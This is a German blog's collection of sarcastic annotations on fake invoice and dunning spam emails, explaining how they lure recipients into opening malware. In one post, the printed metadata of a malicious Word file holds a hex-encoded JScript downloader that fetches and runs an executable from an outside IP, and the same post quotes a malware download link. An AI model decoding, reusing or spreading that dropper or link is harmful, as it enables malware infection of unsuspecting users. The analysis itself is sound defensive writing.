Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Schlagwortarchiv „Mahnung“

Offene Rechnung: Buchung 42628390

Donnerstag, 21. September 2017

Von: Directpay24 GmbH Abrechnung <admin@ebay.com>

Diese Spam hat mit eBay nichts zu tun. Sie wurde über einen angemieteten „Cloud“-Server versendet. Der Absender ist gefälscht.

Sehr geehrter Käufer,

Was habe ich denn gekauft? Und vor allem: Unter welchem Namen habe ich das gekauft. Ich werde ja wohl einen Namen und eine Lieferadresse angegeben haben, sonst käme ja gar nichts bei mir an. Och, habt ihr Spammer zu meiner Mailadresse noch keinen Namen?! Tja, dann klappt es eben nicht mit einer überzeugenden Ansprache des Empfängers.

wir wurden heute am 18.09.2017 vom Unternehmen Directpay24 GmbH gebeten Ihre [sic! Großgeschrieben! Die sprechen mich an!] finanziellen Rechte in Ihrem Fall zu schützen.

Wie, ihr wollt meine Rechte schützen? Und dafür bezahlt jemand anders, bei dem ich angeblich Schulden habe, einfach so Geld an euch? Oder habt ihr bei eurer riesigen Pay-Klitsche mit den achtstelligen Rechnungsnummern mal wieder nicht das Geld für einen richtigen Dolmetscher für eure 08/15-Standardschreiben übrig und formuliert deshalb so missverständlich und falsch?

Wir erwarten die vollständige Zahlung zuzüglich der Zusazgebühren [sic!] bis zum 22.09.2017 auf unser Konto. Können wird [sic!] bis zum genannten Datum keine Zahlung verbuchen, sehen wir uns gezwungen Ihren Mahnbescheid an ein Gericht abzugeben. Sämtliche damit verbundenen Kosten werden Sie tragen.

Wenn ihr wirklich Geld von mir wolltet, statt mich einfach nur dazu überrumpeln zu wollen, dass ich euren vergifteten Anhang öffne, würdet ihr ganz sicher folgende Angaben machen:

  1. Grund für die Forderung (und zwar nicht als Nummer)
  2. Forderungsbetrag
  3. Höhe der „Zusazgebühren“
  4. IBAN für die Überweisung

Aber dann würde ja nahezu jeder Empfänger bemerken, dass eure Mail nichts als alarmierend formulierter Quatsch ist, dessen einziger Zweck es ist…

Eine vollständige Kostenaufstellung Nr. 426283909, der Sie alle Einzelpositionen entnehmen können, fügen wir bei.

…den Empfänger zum Öffnen eines Anhanges aus der Spam zu bringen. Denn allen Bemühungen der Werber um eine weitgehende Enthirnung des Konsumenten zum Trotze wissen die meisten Menschen noch recht genau, was sie gekauft haben.

Wer eine „Rechnung“ schreibt, und nicht mindestens die oben genannten Angaben macht, ist immer ein Spammer. Die Mail kann einfach in den Müll. Es gibt keinen vernünftigen Grund, solche Angaben erst in einem Anhang zu machen, wenn man das Geld auch haben will. Nur, wer das Geld nicht will, drückt sich dermaßen Nichts sagend aus und verweist auf einen Anhang, der geöffnet werden muss.

Der Anhang ist hier ein ZIP-Archiv mit dem Dateinamen 18.09.2017.zip und einer recht wuchtigen Dateigröße von 475 KiB. In diesem ZIP-Archiv…

$ unzip -l 18.09.2017.zip 
Archive:  18.09.2017.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
   487374  2017-09-21 02:11   Rechnung vom 18.09.2017.zip
---------                     -------
   487374                     1 file
$ _

…befindet sich ein weiteres ZIP-Archiv, wenn doppelt ja bekanntlich besser hält und eine kompliziertere Verpackung des kriminellen Sondermülls die Spamfilterung auf Mailservern erschwert. Nun gut…

$ unzip 18.09.2017.zip 
Archive:  18.09.2017.zip
  inflating: Rechnung vom 18.09.2017.zip
$ unzip 'Rechnung vom 18.09.2017.zip' 
Archive:  Rechnung vom 18.09.2017.zip
  inflating: 18.09.2017 Rechnung.com
$ ls -lh *.com
-rw-rw-r-- 1 elias elias 492K Sep 21 02:11 18.09.2017 Rechnung.com
$ file *.com
18.09.2017 Rechnung.com: PE32 executable (GUI) Intel 80386, for MS Windows
$ _

…das Auspacken der doppelt eingepackten Datei führt keineswegs zu einem Dokument, sondern zu einer ausführbaren Datei für Microsoft Windows, die mit gezielten Irreführungen von Kriminellen mit einer Spam zugestellt wurde. Wer auf diese Datei doppelklickt, startet damit ein Programm von Verbrechern. Das ist keine gute Idee. Es ist sogar eine ausgesprochen dumme Idee. Wer wissen will, wie die bessere Idee aussieht, lese bitte einfach noch einmal nach, was ich vor anderthalb Jahren anlässlich des Erpressungstrojaners in der Stadtverwaltung Dettelbach geschrieben habe. Danach einfach den kriminellen Sondermüll löschen und sich den schöneren Dingen am Internet zuwenden!

Bei diesem Anhang handelt es sich nämlich völlig sicher um Schadsoftware. Diese wird allerdings zurzeit nur von rd. einem Fünftel der Antivirus-Programme erkannt. Deshalb ist und bleibt es wichtig, dass man derartige Spam selbst erkennt und löscht, statt darin herumzuklicken.

Aufgrund des andauernden Zahlungsverzug [sic!] sind Sie gezwungen außerdem [sic!], die durch unsere Tätigkeit entstandene Kosten [sic!] von 97,91 Euro zu bezahlen. Um weitete Kosten auszuschließen [sic!], bitten wir Sie den ausstehenden Betrag auf unser Konto [Welches Konto und welcher Gesamtbetrag?] zu überweisen. Berücksichtigt wurden alle Buchungseingänge bis zum 15.09.2017 [sic!].

Aha, die wesentliche Botschaft – machen sie ganz schnell und dringend den Anhang auf – haben die Spammer jetzt rübergebracht, und danach lässt halt die Konzentration ein wenig nach. Deshalb brauche ich eine Sonderschnellüberweisung mit der Zeitmaschine, denn mittlerweile ist schon der 21. September. Aber man kann ja wirklich nicht von den Kriminellen erwarten, dass sie ihre Texte vor dem Absenden einmal kurz überfliegen und allzu peinliche Fehler korrigieren, denn wenn sie sich Mühe geben wollten, dann könnten sie ja einfach arbeiten gehen und brauchten keine Erpressungstrojaner in wehrlose Postfächer zu spammen. Zudem scheint es mir sicher, dass die Absender dieses E-Mülls nicht so gut deutsch können und ihren Text einfach aus einigen anderen Spams zusammengesetzt haben.

Bei Rückfragen oder Reklamationen erwarten wir eine Kontaktaufnahme innerhalb von zwei Werktagen.

Klar doch! Ohne angegebene Kontaktmöglichkeit. Oder soll man einfach die Drecksmail mit ihrem gefälschten Absender beantworten? Der admin@ebay.com wird sich aber sehr über den Kaufmannskram „freuen“, der in Wirklichkeit nur eine Masche ist, um Leuten einen Trojaner unterzujubeln.

Mit verbindlichen Grüßen

Abrechnung Lars Beham

Mit verwünschenden Grüßen!

Spamlektüre Elias Schwerdtfeger

Rechnung zur Bestellung vom 08.10.2016 Nr. 551337926

Samstag, 8. Oktober 2016

Schön, dass die Bestellung ein Datum und eine Nummer hat.

Sehr geehrter Kunde,

Schön, dass ich so einen schönen Namen habe. Der klingt fast so persönlich wie eine Nummer.

leider mussten wir gerade feststellen, dass die Zahlungsaufforderung NR551337926 bis jetzt ergebnislos blieb. Jetzt gewähren wir Ihnen damit letztmalig die Chance, den ausbleibenden Betrag der Firma Online24 Pay GmbH zu begleichen.

Schön, dass die Nummer der Zahlungsaufforderung wiederholt wird. Diesmal ist es sogar die gleiche Nummer wie im Betreff. Das kriegen Spammer nicht immer hin. Ein „Wir“, das sich nicht näher vorstellt und kalt wie eine Wand ist, erinnert an die SPD im letzten Bundestagswahlkampf und gibt mir eine allerletzte Chance, Geld an eine Unternehmung zu bezahlen, mit der ich es noch niemals zu tun hatte. Wofür? Wieviel? Bis wann? Auf welches Konto? Das sind lauter Angaben, die im Text dieser Spam nicht halb so wichtig wie die Nummer der Bestellung sind.

Schließlich will dieser Spammer nicht das Geld seiner Opfer. Auch, wenn er…

Aufgrund des andauernden Zahlungsausstands sind Sie gezwungen dabei, die durch unsere Tätigkeit entstandene Gebühren von 65,38 Euro zu tragen. Bei Rückfragen oder Unklarheiten erwarten wir eine Kontaktaufnahme innerhalb von drei Werktagen. Um weitete Kosten auszuschließen, bitten wir Sie den ausstehenden Betrag auf unser Bankkonto zu überweisen. Berücksichtigt wurden alle Buchungseingänge bis zum 07.10.2016.

…ständig im ungeübten Technokratentone vom Gelde spricht und sogar Fantasiegebühren verlangt und zu einer Kontaktaufnahme auffordert, ohne auch nur eine verdammte Adresse, eine Mailadresse oder eine Telefonnummer für die Kontaktaufnahme zu nennen. Das ist alles nur dafür da, den Empfänger dieser Spam einzuschüchtern und zu verängstigen, denn der Spammer weiß als erfahrener Verbrecher ganz genau, dass Angst dumm macht. Und wer dumm und ängstlich ist, der klickt halt gut…

Die gesamte Überweisung erwarten wir bis spätestens 14.10.2016. Falls wir bis zum genannten Termin keine Zahlung bestätigen, sehen wir uns gezwungen unsere Forderung an ein Gericht abzugeben. Alle damit verbundenen Zusatzkosten gehen zu Ihrer Last.

Eine Wendung wie „sehen wir uns gezwungen unsere Forderung an ein Gericht abzugeben“ kann nur jemand tippen, der keine Ahnung vom gerichtlichen Mahnverfahren hat. Dafür fehlt so eine Angabe wie die Kontonummer, auf die man bis zum 14. Oktober überweisen soll – wer immer wirklich Geld haben wollte, würde diese Kontonummer ganz sicher angeben. (Übrigens würde auch jeder in der deutschen Sprache leidlich geübte Schreiber bei einer Fristsetzung den Monat als Wort ausschreiben, damit Missverständnisse beim Empfänger völlig ausgeschlossen sind.) Dieser kriminelle Spammer will kein Geld, er will nur…

Eine vollständige Forderungsausstellung Nr. 551337926, der Sie alle Buchungen entnehmen können, befindet sich im Anhang.

…dass man den Anhang aufmache.

Ein bisschen mehr zu diesem Anhang kommt in Kürze.

Mit verbindlichen Grüßen

Rechnungsstelle Marco Cock

Das heißt aber „unter Erbietung meiner vorzüglichsten Hochachtung verbleibe ich als ihr ergebener Marco Cock“. :mrgreen:

Diese E-Mail enthält vertrauliche und rechtlich geschützte Informationen. Wenn Sie nicht der richtige Adressat sind und diese E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und vernichten Sie diese E-Mail. Das Kopieren von Inhalten dieser E-Mail und die Weitergabe ohne Genehmigung ist nicht erlaubt und stellt eine Urheberrechtsverletzung dar.

Diese unverschlüsselte und nicht digital signierte Spam ist offen wie eine Postkarte durch das Internet befördert worden und konnte auf ihrem Weg von jedem mitgelesen oder sogar verändert werden. Wer behauptet, dass sie ganz geheime Geheimgeheimnisse enthält, dokumentiert damit seine technische Ahnungslosigkeit und seine lebenspraktische Dummheit. Wer ein Urheberrecht auf den Text einer E-Mail beansprucht, dokumentiert damit ebenfalls etwas für einen zivilisierten Menschen äußerst Unvorteilhaftes. Das tun allerdings nicht nur dumme Spammer; so einen vor Blödheit quietschenden Bullshit habe ich auch schon in E-Mail von Unternehmen gesehen, die gar nicht so lächerlich wie derartige Proklamationen in der gewerblichen Kommunikation sind. Wer mag, kann ja gern mal versuchen, vor Gericht sein „Urheberrecht“ gegen mich durchzusetzen und dabei einem möglicherweise erheitertem Gerichte gegenüber darlegen, dass es sich bei seiner Mail um ein Werk mit der dazu erforderlichen, schützenswerten Schöpfungshöhe handele, wenn ich eine seiner Mails zitiere. Ein kleiner Tipp von mir als Nichtjuristen, der natürlich keine Rechtsberatung geben darf und für eine Rechtsberatung auf einen richtigen Rechtsanwalt verweisen muss: Eine Bezugnahme aufs Fernmeldegeheimnis halte ich für wesentlich erfolgversprechender, wenn man es schon nötig hat, solche Veröffentlichungen juristisch zu unterdrücken. ;)

So, jetzt aber wieder zur Sache, nämlich…

Zum Anhang

An die Spam ist ein ZIP-Archiv mit dem Dateinamen 08.10.2016.zip angehängt, morgen wird es vermutlich das Datum von morgen werden. Dieses ZIP-Archiv ist in meinem Exemplar der Spam kaputt (es hat eine Dateigröße von null Bytes) und deshalb kann ich es nicht näher untersuchen – ich gehe aber davon aus, dass es in anderen Fällen, in denen das Spamskript funktioniert hat¹, wie üblich eine ausführbare Datei für Microsoft Windows sein wird. Typischerweise wird auf diese Weise sehr aktuelle Schadsoftware zugestellt, die von den Antivirus-Programmen noch nicht erkannt werden kann. Antivirus-Programme können nämlich nur Schadsoftware erkennen, die bei den Herstellern der Antivirus-Programme bereits bekannt ist und sind generell von eher zweifelhaftem Nutzen.

Es handelt sich keineswegs um ein Dokument, aus dem irgend etwas hervorgeht. Es handelt sich um ein Windows-Programm, das von einem Verbrecher mit einer irreführend formulierten, vorsätzlich einschüchternden Spam zugestellt wurde. Die Verpackung in einem ZIP-Archiv hat nur den Zweck, Antivirus-Programmen auf einem Mailserver die Analyse zu erschweren², denn der Spammer lebt davon, dass seine kriminellen Spams ankommen. Wer eingeschüchtert ist, Microsoft Windows verwendet und angstvoll klicke-di-klick den Anhang öffnet, hat danach einen Computer anderer Leute auf seinem Schreibtisch stehen. Und diese Leute wären besser mit Handschellen und vergitterten Fenstern bedient!

Es ist immer verantwortungslos, dumm und gefährlich, Mailanhänge in E-Mails von Unbekannten zu öffnen. Bitte, lasst es einfach sein! Und öffnet auch bei scheinbar bekannten Absendern keine Mailanhänge, die nicht vorher explizit und über einen anderen Kanal als E-Mail abgesprochen wurden, denn der Absender einer E-Mail kann beliebig gefälscht werden! Im Zweifelsfall ist auch dann noch die Zeit für ein kurzes Telefonat, wenn es einmal sehr eilig ist…

Diese kleine Vorsicht ist bei E-Mail wirksamer als jedes so genannte Antivirus-Programm.

¹Typischerweise sind die Anhänge von Schadsoftware-Spams nicht identisch, um eine leichte Erkennung und Ausfilterung des gefährlichen Mülls unmöglich zu machen. Diese Schadsoftware-Spammer leben nun einmal davon, dass ihre Mails auch ankommen. Natürlich werden diese „unterschiedlichen“ Anhänge mit einem Skript erzeugt, und natürlich machen auch die Spammer immer wieder einmal Fehler beim Programmieren. Deshalb kommt es zu solchen „verunglückten“ Anhängen. Nach meinen Erfahrungen ist im Durchschnitt rd. jede dreißigste Mail mit Schadsoftware wegen eines Programmierfehlers der Spammer unwirksam, in letzter Zeit „bessert“ sich das jedoch.

²Natürlich ist es möglich, beim Antivirus-Scan auf einem Mailserver auch ZIP-Archive auszupacken. Das wird aber meist nicht getan, damit der Mailserver nicht von kecken Angreifern mit einer recht einfach zu bauenden ZIP-Bombe lahmgelegt werden kann. Generell kann und sollte man einen ZIP-komprimierten Mailanhang als Indiz dafür betrachten, dass in der Mail Schadsoftware transportiert werden soll.

Info von ihre Bank

Freitag, 12. August 2016

Ja, ich weiß, Spammer: Flektierende Sprachen sind wirklich schwierig zu beherrschen. Übung könnte einen Meister machen. Aber nicht bei dir, denn du willst ja nur spammen.

Sehr geehrter Kunde!

Diese Mail eines unbekannten Absenders beginnt mit der Behauptung, dass man dort „Kunde“ sei, aber der Name des „Kunden“ ist beim Absender offenbar nicht bekannt. Über diese Kleinigkeit geht er hinweg, indem er behauptet…

Ihre Bank hat die Lastschrift zuruck buchen lassen. Sie haben eine ungedeckte Rechnung bei HSH Nordbank.
Bitte laden Sie die Datei aus dem Link:
http://www.1800cloud.com/infos/report.doc

…dass man eine unbeglichene Rechnung hat, weil ein Bankkonto mit einer ungenannten Kontonummer nicht gedeckt war. Eine Rechnung für irgendwas. Bei irgendwem. Über irgendeinen Betrag. Von irgendwann. Irgendetwas Näheres zur angeblichen Sache kann man nur erfahren, wenn man ein Word-Dokument öffnet, das in der anonym formulierten E-Mail eines Unbekannten verlinkt wurde.

Wenn man das nicht sofort und möglichst hirnlos tut…

Aufgrund des andauernden Zahlungsruckstands sind Sie verpflichtet auberdem [sic!], die durch unsere Beauftragung entstandenen Kosten von 19,67 Euro zu bezahlen. Wir erwarten die Zahlung bis spatestens 17.08.2016 auf unser Konto. Namens und in Vollmacht unseren Mandanten fordern wir Sie auf, die offene Forderung sofort zu begleichen.

Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der festgelegten Frist wird die Angelegenheit dem Staatsanwalt und der Schufa ubergeben. Die vollstandige Forderungsausstellung, der Sie alle Positionen entnehmen konnen, fugen wir bei. Fur Ruckfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

…geht es gleich zu Staatsanwalt und Schufa, statt ganz normal beim zuständigen Mahngericht einen Mahnbescheid zu beantragen. Der Spammer weiß ja genau, dass Angst dumm macht – und man muss schon ein bisschen dumm sein, um eine Datei zu öffnen, die einem mit Spam zugestellt wurde.

Leben Sie wohl!

Geh sterben, Spammer!

Die angehängte Datei ist…

$ file report.doc | sed 's/, /\n/g'
report.doc: Composite Document File V2 Document
Little Endian
Os: Windows
Version 6.1
Code page: 1251
Title:  
Subject: b
Author: c
Keywords: g
Comments: 66756e6374696f6e20737461727428297b7472797b76617220783d6e657720416374697665584f626a65637428226d73786d6c322e786d6c6874747022293b76617220663d6e657720416374697665584f626a6563742822736372697074696e672e66696c6573797374656d6f626a65637422293b76617220773d6e657720416374697665584f626a6563742822777363726970742e7368656c6c22293b76617220613d6e657720416374697665584f626a656374282261646f64622e73747265616d22293b76617220703d772e457870616e64456e7669726f6e6d656e74537472696e6773282225746d702522292b225c5c33313230392e657865223b782e6f70656e2822474554222c22687474703a2f2f38382e3131392e3137392e3136302f316269796375686f7165747a6f776161776e6561622e657865222c66616c7365293b782e73656e6428293b696628782e737461747573203d3d20323030297b696628662e66696c65657869737473287029297b662e64656c65746566696c652870293b7d612e6f70656e28293b612e747970653d313b612e777269746528782e726573706f6e7365626f6479293b612e73617665746f66696c652870293b612e636c6f736528293b772e72756e28702c312c30293b7d7d63617463682865297b7d7d
Template: Normal.dot
Last Saved By: admin
Revision Number: 2
Name of Creating Application: Microsoft Office Word
Create Time/Date: Sat Aug  6 17:17:00 2016
Last Saved Time/Date: Sat Aug  6 17:17:00 2016
Number of Pages: 1
Number of Words: 23
Number of Characters: 116
Security: 0
$ _

…ein in null Sekunden erstelltes Dokument für Microsoft Word, das 23 Wörter auf einer Seite enthält. Wer es öffnet und trotz der Warnung die Ausführung von Makros in Word zulässt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Damit man auch wirklich so dumm ist, trotz der Warnung den Programmcode von Spammer ausführen zu lassen, steht ein Hinweis im Dokument:

Attention! This document was created in a newer version of Microsoft Office. To display the contents of the document need to enable macros

Kurz und schnell gesagt: Es handelt sich um Schadsoftware. Natürlich ist es wieder einmal die frischeste Brut der Kriminellen, und deshalb wird der verbrecherische Müll (der vermutlich einen Erpressungstrojaner aus dem Internet nachlädt) zurzeit nur von einer Minderheit der gängigen Antivirus-Schlangenöle erkannt. Wer sich auf sein Antivirus-Programm verlassen hat, ist also wieder einmal verlassen.

Deshalb ist es so wichtig, niemals auf derartige Spam hereinzufallen, sondern sie zu erkennen. Das ist in diesem Fall relativ einfach gewesen:

  1. Man ist angeblich Kunde, wird aber in einer E-Mail nicht persönlich angesprochen.
  2. Es ist völlig unklar, wer der Absender der E-Mail ist. Es gibt keinerlei Angaben für eine eventuelle Rückfrage.
  3. Es ist eine angebliche Mahnung, aber im Text der Mail fehlen sämtliche Angaben zum Gegenstand der Mahnung. Stattdessen soll in die Mail geklickt werden, um zu erfahren, um was es überhaupt geht.
  4. Der Text der Mail strotzt vor beängstigendem Bullshit, der in dieser Form niemals von einem Kaufmann oder einem Rechtsanwalt geschrieben würde.
  5. „Leben Sie wohl!“ als Abschiedsformel bedarf keiner weiteren Kommentierung

Generell sind Dateien, die ohne vorherige Absprache mit E-Mail zugestellt wurden, mit äußerster Vorsicht zu behandeln. E-Mail ist bei Kriminellen so beliebt, weil es sich um einen Weg handelt, jemanden anders Dateien und ausführbaren Code auf die Festplatte zu spielen – und zwar mit beliebig fälschbarem Absender. Auch bei bekannten Absendern niemals eine derartige Datei öffnen, ohne vorher auf einem anderen Weg als über E-Mail (zum Beispiel telefonisch) kurz Rücksprache gehalten zu haben! Antivirus-Programme nützen gar nichts. Ich wiederhole, weil die Werbung und die Computerjournaille ständig das Gegenteil behauptet: Antivirus-Programme nützen gar nichts. Wenn man sich darauf verlässt, sind sie sogar gefährlich. Das beste Antivirus-Programm ist und bleibt das Gehirn.

Payment

Donnerstag, 23. Juni 2016

Dear gammelfleisch,

Genau mein Name! :D

Our records show that we have not yet received payment for the previous order #A-797071
Could you please send payment as soon as possible?

Please find attached file for details.

Und einmal das Übliche. Du musst Geld bezahlen. An jemanden, der sich im Absender (in meinem Fall) „Stan Jones“ nennt. Ohne Grund. Wegen der Bestellnummer 08/15. Die zu einer nicht näher bezeichneten Bestellung gehört. Bei einer Unternehmung, die es nicht für erforderlich hält, sich selbst einen Namen zu geben. Mit Kaufleuten, die in ihre Mahnmail nicht reinschreiben, wie groß der Betrag ist. Mach das bitte so schnell wie möglich! Wenn du herausbekommen willst, um was zum hl. Henker es sich hier handelt, wieviel Geld du bezahlen sollst oder was auch immer, dann mach gefälligst den Anhang auf! Auf eine Rückfragemöglichkeit im Text der Mail wurde verzichtet, weil das Mailpapier gerade so knapp ist.

Genau so wird Schadsoftware verpackt. Noch vor jeder eingehenden Prüfung ist klar, dass es sich beim Anhang um das reinste Gift handeln wird. Der Anhang ist ein ZIP-Archiv (mit einerm personalisierten Dateinamen, der in jeder Spam etwas anders lautet, so dass eine Websuche danach fehlschlägt), in dem sich nicht ein wie auch immer geartetes Dokument, sondern eine vorsätzlich kryptisch und unverständlich gecodete Javascript-Datei befindet. Diese wird unter Microsoft Windows übrigens im Windows Scripting Host ausgeführt. Es handelt sich um eine ausführbare Datei für Microsoft Windows, die bei einem Doppelklick ausgeführt wird, alles kann, was jedes gestartete Windows-Programm kann und in einer Spam mit vorsätzlich irreführendem Text zugestellt wurde.

Oder kurz gesagt: Es ist ganz sicher eine Schadsoftware. Wer die Datei im ZIP-Archiv doppelklickt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Das Antivirus-Programm wird in vielen Fällen nicht helfen, weil es die Schadsoftware nicht erkennt, aber zum Glück hat ein Mensch ein Gehirn, mit dem sich diese Spam sicher als Spam erkennen und löschen lässt. Das ist der beste Virenschutz. Alles weitere habe ich schon so oft geschrieben, dass es mich ermüdet, es hier noch einmal zu wiederholen – ich verweise auf meinen Text vom 5. März dieses Jahres.

Yours sincerely
Stan Jones
Mexico Key Account Director

Diese Spam kommt mit Winkewinke vom Kriminellen, der lieber nicht seinen richtigen Namen unter die Mail schreibt.

Vorname Nachname Ihre Abrechnung 60600263 vom 26.04.2016

Dienstag, 26. April 2016

Diese Spams sind die Pest des heutigen Tages. Es gibt unglaublich viel davon.

Anstelle von „Vorname Nachname“ stand hier der richtige bürgerliche Name des Empfängers. Den hätte der Spammer zwar auch in das Empfängerfeld schreiben können, aber in der Betreffzeile wirkt es nun einmal alarmierender, und alarmieren will dieser Spammer. Denn er hat frische Schadsoftware anzubieten, die man sich nach einer Überrumpelung installieren soll, indem man einen Mailanhang öffnet.

Von: Rechnungsstelle Amazon AG <ebay (at) ebay (punkt) de>

So so, eBay und Amazon sind neuerdings fusioniert… schade eigentlich, dass die das selbst noch gar nicht gemerkt haben. :mrgreen:

Der Spammer will hier natürlich die Kunden zweier beliebter Websites erreichen und zur Installation von Schadsoftware motivieren – aber die Art, wie er es getan hat, ist so, als würde in einer Absenderadresse als Klarname „etwas bei Volkswagen“ angegeben, und dazu eine Mailadresse in der BMW-Domain. Wenn man so etwas sieht, kann man sofort Zuckungen im Löschfinger bekommen. Es handelt sich ganz sicher um eine Spam von Kriminellen, deren Absender gefälscht ist.

Es gibt genau die gleiche Masche (mit geringfügigen Änderungen, aber ebenfalls mit dem Merkmal der erwähnten Anschrift) auch als angebliche Mail mit dem Absender „Rechtsanwalt GiroPay AG“ und der gefälschten Absenderadresse service (at) giropay (punkt) de und vermutlich in einigen weiteren Geschmacksrichtungen mehr.

Sehr geehrte(r) Vorname Nachname,

leider haben wir festgestellt, dass unsere Zahlungsaufforderung NR606002630 bisher ergebnislos blieb. Heute gewähren wir Ihnen nun letztmalig die Möglichkeit, den nicht gedeckten Betrag der Firma Amazon AG zu begleichen.

Ganz schlimme Zahlungsaufforderung. Sie hat eine Nummer. Denn Nummern sind wichtig. Um was geht es? Steht da nicht. Von wann ist sie? Steht da nicht. Objektiv steht da gar nichts und man soll völlig grundlos Geld bezahlen – wenn man mal von dem kleinen Patzer des Autors absieht, dass man „nicht gedeckte Beträge von Amazon begleichen“ kann. Schön, dass man seinen Beitrag dazu leisten darf, Amazon vor der Insolvenz zu bewahren.

Niemand würde sich so unklar ausdrücken, wenn es um Geld geht.

Nachdem so wenig Konkretes gesagt wurde, hat der Spammer allerdings auch etwas Konkreteres mitzuteilen – auch wenn der Empfänger das schon längst kennt:

Verbindliche Personalien:

Vorname Nachname
Straße Hausnummer
Postleitzahl Wohnort

Tel. Telefonnummer

Hier steht im Original der Name und die korrekte Anschrift des Empfängers nebst seiner korrekten Telefonnummer. Ich habe zurzeit mehrere derartiger Spams von Lesern, die allesamt eine korrekte Anschrift und eine korrekte Telefonnummer enthalten. Wo die Daten herkommen, ist mir zurzeit unklar – aber Spammer sind seit mehreren Jahren darum bemüht, auf allen nur denkbaren Wegen zu möglichst vielen Mailadressen weitere Daten zu erhalten und in großen Datenbanken zusammenzuführen. Meine spontane Vermutung ist, dass diese Daten über trojanische Apps aus Smartphone-Adressbüchern abgegriffen werden. In einem Fall war die angegebene Telefonnummer seit mindestens einem Jahr nicht mehr aktuell (das Mobiltelefon ging verloren). Der Datenbestand, aus dem sich die Spammer bedienen, scheint also mindestens ein Jahr alt zu sein. Allerdings sind auch viele Adressbücher in Smartphones nicht die Aktuellsten. Näheres dazu kann ich aber erst sagen, wenn mir ein paar Fälle bekannt sind, in denen die Quelle der Daten völlig klar ist, weil zum Beispiel eine ganz spezifische, nur in einem Kontext verwendete E-Mail-Adresse vom Spammer verwendet wurde, so dass man der Sache auf die Spur kommen kann.

Wer hierzu weitere Hinweise geben möchte, kann einfach einen Hinweis in den Kommentaren geben, so dass alle Leser etwas davon haben. Ich gehe davon aus, dass Millionen von diesen Spams unterwegs sind – und ich selbst habe „leider“ nur eine nicht-personalisierte mit der gleichen Schadsoftware-Brut. (Wer nach einer solchen Spam zu Recht etwas paranoid geworden ist: Natürlich kann man sich hier einfach einen Namen und eine Mailadresse für den Kommentar ausdenken, eine Registrierung ist nicht erforderlich.)

Das ist ein gutes Beispiel dafür, warum Datenschutz wichtig ist. Eine ansonsten ganz durchschnittliche Schadsoftware-Spam wird ungleich gefährlicher, wenn sie mit solchen Daten personalisiert wurde.

Aufgrund des andauernden Zahlungsverzug sind Sie verpflichtet dabei, die durch unsere Inanspruchnahme entstandene Gebühren von 44,40 Euro zu bezahlen. Bei Fragen oder Unklarheiten erwarten wir eine Kontaktaufnahme innerhalb von drei Werktagen. Um weitete Kosten auszuschließen, bitten wir Sie den ausstehenden Betrag auf unser Konto zu überweisen. Berücksichtigt wurden alle Zahlungseingänge bis zum 25.04.2016.

So so, Kontaktaufnahme in drei Tagen – und eine Kontaktmöglichkeit ist nicht angegeben. Dafür wird es richtig teuer. Wofür, wird nicht gesagt. Sind halt Gebühren. Die entstehen halt. Wisst schon. Wer erschrocken ist und von seiner leichten Panik verdummt etwas Näheres erfahren möchte…

Eine vollständige Kostenaufstellung Nr. 606002630, der Sie alle Positionen entnehmen können, fügen wir bei.

…muss einen Anhang einer E-Mail öffnen, die mit gefälschtem Absender einen falschen Eindruck erwecken will, um rauszukriegen, um was zum hackenden Henker es hier überhaupt geht.

In den mir vorliegenden E-Mails ist dieser Anhang ein ZIP-Archiv, in dem ein ZIP-Archiv liegt, in dem eine ausführbare Datei für Microsoft Windows liegt. In einem Exemplar gibt es keine doppelte Verpackung, sondern nur eine einfache. In keinem Fall handelt es sich um ein Dokument, auch wenn das Piktogramm einen falschen Eindruck vom Charakter der Datei erwecken will.

Es handelt sich völlig klar um Schadsoftware. Diese wird zurzeit von den meisten Antivirus-Programmen nicht als Schadsoftware erkannt. Wer sich auf diesen Schutz verlassen hat, ist verlassen. So genannte Antivirus-Programme funktionieren nämlich nicht. Und wenn man sich wegen dieser Programme sicher fühlt und deshalb glaubt, unüberlegt handeln zu dürfen, sind diese Programme sogar gefährlich und arbeiten der Organisierten Kriminalität zu.

Deshalb ist es wichtig, dass man derartige Spam selbst erkennt und niemals darin herumklickt, sondern sie löscht. (Wer mag, kann natürlich gern zur Polizei gehen und Strafanzeige erstatten, aber über die Ermittlungschancen sollte man sich keine Illusionen machen.) Grundsätzlich sollte niemals ein E-Mail-Anhang geöffnet werden, der nicht vorher explizit und über einen anderen Kanal als E-Mail abgesprochen wurde – und niemand sollte sich vom Absender einer Mail verblenden lassen, denn dieser ist beliebig fälschbar¹.

Wir erwarten die Zahlung bis zum 28.04.2016 auf unser Bankkonto. Falls wir bis zum genannten Termin keine Überweisung einsehen, sehen wir uns gezwungen Ihre Forderung an ein Gericht abzugeben. Alle damit verbundenen Zusatzkosten werden Sie tragen.

Jedes Unternehmen, das auch Geld bekommen möchte, würde an dieser Stelle seine Bankverbindung und den Betrag angeben. Der Spammer will aber nur, dass ein Anhang geöffnet wird.

Sollten Sie den Rechnungsbetrag bereits vorab an uns gezahlt haben, ist dieses Schreiben nur für Ihre Unterlagen bestimmt. Sollten Sie Fragen haben, stehen wir Ihnen gerne zur Verfügung.

Klar, eine E-Mail nur für meine Unterlagen… :D

Und die Fragen stellt man wo? Ach, Kontaktdaten gibts keine.

Mit freundlichen Grüßen

Rechnungsstelle Silas Krantz

„Freundlich“ wie eine Ohrfeige

Dein Schadsoftware-Spammer mit dem aktuellen Erpressungstrojaner

